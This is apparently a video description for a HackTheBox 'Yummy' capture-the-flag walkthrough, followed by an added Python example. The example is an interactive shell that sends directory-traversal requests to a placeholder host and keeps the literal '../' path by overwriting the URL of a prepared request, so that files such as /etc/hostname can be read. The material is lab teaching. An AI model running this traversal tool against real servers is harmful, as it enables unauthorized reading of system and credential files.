In Yummy from HackTheBox, I've got a file read vulnerability that takes two requests to trigger, as well as a bit of setup with the website. Using Python's cmd module and requests, I'll write a shell that takes a filename, returns the contents of the file (or the reason it can't), and then reprompts. To get requests to send the directory traversal as written, I'll use the prepare mechanism.
Full Yummy Solution: https://0xdf.gitlab.io/2025/02/22/htb-yummy.html
[00:00] Introduction
[01:00] Vulnerability demo
[04:18] Initial CMD shell
[07:25] __init__
[08:26] login function
[10:20] Get valid booking ID
[16:20] Default command
[19:38] Preparing request for traversal
[24:09] Update to handle any file
[24:55] Checks for access denied and file not found
[27:01] Adding file download
[31:45] Conclusion
#HackTheBox #ctf #xss
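
The prepare mechanism mentioned in the description, as an added example (not the code from the video): requests collapses `../` segments when it prepares a URL, so the shell prepares the request through the session and then writes the literal URL back. The host, path prefix and the `FileShell`, `raw_request` and `normalized_url` names are assumptions made for illustration, and the injectable `send` lets the shell be exercised offline.

```python
import cmd
import requests

BASE = "http://target.example"   # constructed placeholder host
PREFIX = "/download/../.."       # constructed placeholder path, not Yummy's endpoint


def normalized_url(path):
    """URL requests builds by default: dot segments are collapsed client-side."""
    return requests.Request("GET", BASE + PREFIX + path).prepare().url


def raw_request(session, path):
    """Prepare through the session (keeps cookies), then restore the typed URL."""
    url = BASE + PREFIX + path
    prepared = session.prepare_request(requests.Request("GET", url))
    prepared.url = url  # overwrite the normalized URL with the literal one
    return prepared


class FileShell(cmd.Cmd):
    prompt = "file> "

    def __init__(self, session, send=None):
        super().__init__()
        self.session = session
        self.send = send or session.send  # injectable so it can be tested offline

    def default(self, line):
        """Any input that is not a do_* command is treated as a filename."""
        try:
            resp = self.send(raw_request(self.session, line.strip()))
        except requests.RequestException as exc:
            print(f"[-] request failed: {exc}")
            return
        if resp.status_code == 200:
            print(resp.text)
        else:
            print(f"[-] HTTP {resp.status_code} for {line}")

    def do_exit(self, _arg):
        """Leave the shell."""
        return True


if __name__ == "__main__":
    print(normalized_url("/etc/hostname"))  # traversal collapsed by requests
    print(raw_request(requests.Session(), "/etc/hostname").path_url)  # kept as typed
    FileShell(requests.Session()).cmdloop()
```

The `path_url` of the prepared request is the request target the adapter puts on the wire, which is why comparing it against the default URL shows whether the traversal survives.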